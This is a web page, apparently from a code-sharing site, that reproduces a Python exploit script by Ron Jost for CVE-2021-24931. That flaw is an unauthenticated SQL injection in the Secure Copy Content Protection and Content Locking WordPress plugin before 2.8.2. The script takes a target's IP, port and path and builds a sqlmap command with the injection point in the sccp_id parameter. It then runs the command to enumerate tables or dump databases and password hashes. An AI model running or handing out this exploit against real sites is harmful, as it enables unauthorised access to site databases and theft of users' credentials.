扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 |
# Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated) # Date 08.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://ays-pro.com/ # Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip # Version: < 2.8.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24931 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md ''' Description: The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection. ''' banner = ''' .--. .-..-. .--. .---..--. .---. ,-. .---. .-. .--. .----.,-. : .--': :: :: .--'<code>--. :: ,. :</code>--. :.': <code>--. : .'.': .; :</code>--;.': : : : :: :: <code>;_____ ,',': :: :,',' </code>: : _____ ,','.'.'_<code>._, : .' '</code>: : : :__ : <code>' ;: :__:_____:.'.'_ : :; :.'.'_ : ::_____:.'.'_ :_ </code> :: : _<code>,</code>.: : .__.' </code>.,' <code>.__.':____;</code>.__.':____;:_; :____;:_: :_:`.__.':_; [+] Copy Content Protection and Content Locking - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH # Exploit: print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" ' print('Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --bannerRetrieve DBMS banner') print(' --current-userRetrieve DBMS current user') print(' --current-dbRetrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tablesEnumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schemaEnumerate DBMS schema') print(' --dumpDump DBMS database table entries') print(' --dump-allDump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url +retrieve_mode + ' --answers="follow=Y" --batch -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) |
体验盒子
